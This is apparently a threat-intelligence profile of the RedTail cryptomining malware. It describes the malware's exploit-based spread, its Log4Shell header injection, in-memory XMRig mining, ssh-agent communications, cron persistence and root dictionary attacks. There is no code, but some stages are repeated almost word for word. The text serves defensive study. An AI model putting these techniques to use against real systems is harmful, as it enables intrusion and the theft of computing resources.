RedTail | |
Type of Malware | Cryptominer |
Country of Origin | Unknown |
Date of initial activity | 2024 |
Associated Groups | Unknown |
Targeted Countries | Unknown |
Motivation | Finantial gain by using infected systems to mine cryptocurrencies |
Attack vectors | The malware spreads by using at least six different web exploits, targeting Internet of Things (IoT) devices (such as TP-Link routers), web applications (including the China-origin content management system ThinkPHP), SSL-VPNs, and security devices like Ivanti Connect Secure and Palo Alto GlobalProtect. |
Targeted systems | Linux |
Overview
The RedTail malware primarily functions as a Monero and select other cryptocurrencies miner, utilizing XMRig which operates in memory.
Security researcher Patryk Machowiak first documented RedTail in January 2024 in connection with a campaign exploiting the Log4Shell vulnerability (CVE-2021-44228) to deploy the malware on Unix-based systems.
Overall, the malware is not very complex, although shifting almost all operations to memory makes it significantly harder to completely analyze its behavior. Another interesting aspect of its behavior is the use of SSH-AGENT sockets to fully encrypt network traffic between the malware and the attackers’ servers.
The latest version of the miner, detected in April, includes significant updates, such as an encrypted mining configuration used to launch the embedded XMRig miner. Another notable change is the absence of a cryptocurrency wallet, suggesting that the threat actors may have switched to a private mining pool or a pool proxy to reap financial benefits.
Akamai described RedTail as having a high level of polish, an aspect not commonly observed among cryptocurrency miner malware families in the wild. It is currently unclear who is behind the cryptocurrency mining malware, although the use of private crypto-mining pools mirrors a tactic used by the North Korea-linked Lazarus Group, which has a history of orchestrating wide-ranging cyber attacks for financial gain, the company noted.
“The investments required to run a private crypto-mining operation are significant, including staffing, infrastructure, and obfuscation,” the researchers concluded. “This sophistication may be indicative of a nation-state-sponsored attack group.”
Targets
Vulnerable Internet of Things (IoT) devices (such as TP-Link routers), web applications (including the China-origin content management system ThinkPHP), SSL-VPNs, and security devices like Ivanti Connect Secure and Palo Alto GlobalProtect.
How they operate
Stage 1: Initial Attack
The attackers initiated their scheme by embedding malicious code within the HTTP headers of a web request. These headers, which are standard components of web communication, are typically processed by servers or web applications. Exploiting a vulnerability known as CVE-2021-44228, the attackers aimed to execute their code through the logging engine of the web server application.
In this instance, the malicious content was concealed within the “User-Agent” header using base64 encoding techniques. Upon decoding, the code revealed instructions to create a temporary directory on the target system, download and execute a script from a remote server. This script, when executed, would in turn download and install harmful software onto the compromised system.
The attackers’ strategy involved:
Crafting a concealed command and sending it to the target server.
Initiating the creation of a hidden folder on the victim’s system and downloading a file into it.
Executing a script to ensure the successful installation of the downloaded software.
This method allowed the attackers to stealthily infiltrate systems, initiating a chain of events that could lead to the installation of malicious software and potential compromise of the victim’s data and system integrity.
Stage 2: RedTail Malware Deployment
The RedTail malware was executed in the first stage. The analysis shows that the
execution moved to the system memory.
This behavior is confirmed via static code analysis of unpacked malware sample.
The malware main activity is as follows:
1. System information gathering
2. Dropping ssh-agent socket for encrypted communication with the attacker server
3. Creating a persistence mechanism by setting up a cron job in crontab of the user
account to trigger when the system is rebooted
4. Malware establishes connection via ssh-agent socket and gathers configuration
from attackers server
5. Malware starts mining Monero cryptocurrency
RedTail Malware Threat Analysis Report
The analysis of the run time memory discovered that the RedTail malware uses XMRig
for Monero cryptocurrency mining.
The malware did not seem to have any defence or kill switch mechanism to detect
malware analysis sandbox.
The malware has shown varied behaviour depending on the user access level. When
first run as unprivileged user, the malware deployed the miner and attempted
dictionary attack on the “root” user account
Stage 3: Additional Exploitation Activities
During analysis, the malware was observed performing additional activities which
amounted to exploitation attempts for another vulnerability. These, however, are
specifically targeted to the environment in which the malware is running and the
information was enumerated in an earlier stage.
Stage 4: RedTail Malware Deployment
After the initial execution of the RedTail malware in the first stage, it was observed that the execution process shifted to the system’s memory. This behavior was confirmed through a detailed analysis of the unpacked malware sample.
The primary activities of the malware include:
Gathering system information.
Establishing an encrypted communication channel with the attacker’s server by dropping an ssh-agent socket.
Creating a persistence mechanism by setting up a cron job in the user’s crontab to ensure the malware triggers upon system reboot.
Establishing a connection via ssh-agent socket to receive configuration details from the attacker’s server.
Initiating Monero cryptocurrency mining operations.
During the runtime memory analysis, it was revealed that the RedTail malware utilizes XMRig for Monero cryptocurrency mining. Notably, the malware did not exhibit any defensive or kill switch mechanisms to thwart malware analysis sandboxes.
Furthermore, the behavior of the malware varied based on the user’s access level. Upon initial execution as an unprivileged user, the malware deployed the miner and attempted a dictionary attack on the “root” user account.
Stage 5: Additional Exploitation Activities
Subsequent analysis of the malware unveiled additional activities, constituting exploitation attempts for another vulnerability. However, these activities appeared to be tailored to the specific environment in which the malware was operating, as previously enumerated in an earlier stage.
Latest RedTail Miner Updates
The most recent version of the miner, detected in April, introduces significant enhancements. These updates include an encrypted mining configuration utilized to launch the embedded XMRig miner.
A notable alteration is the absence of a cryptocurrency wallet, suggesting that the threat actors may have transitioned to either a private mining pool or a pool proxy to maximize financial gains.
According to researchers, the configuration indicates a concerted effort by the threat actors to optimize the mining operation, reflecting a deep understanding of crypto-mining techniques.
In contrast to an earlier RedTail variant reported in early 2024, this malware employs advanced evasion and persistence techniques. It forks itself multiple times to impede analysis, actively debugging its processes, and terminating any instances of GNU Debugger it encounters.
Akamai characterizes RedTail as exhibiting a high level of sophistication, a trait uncommon among cryptocurrency miner malware families encountered in the wild.
Significant Malware Campaigns
- Threat actors behind the RedTail cryptomining malware, initially reported in early 2024, have incorporated the recent Palo Alto PAN-OS CVE-2024-3400 vulnerability into their toolkit. (May 2024)
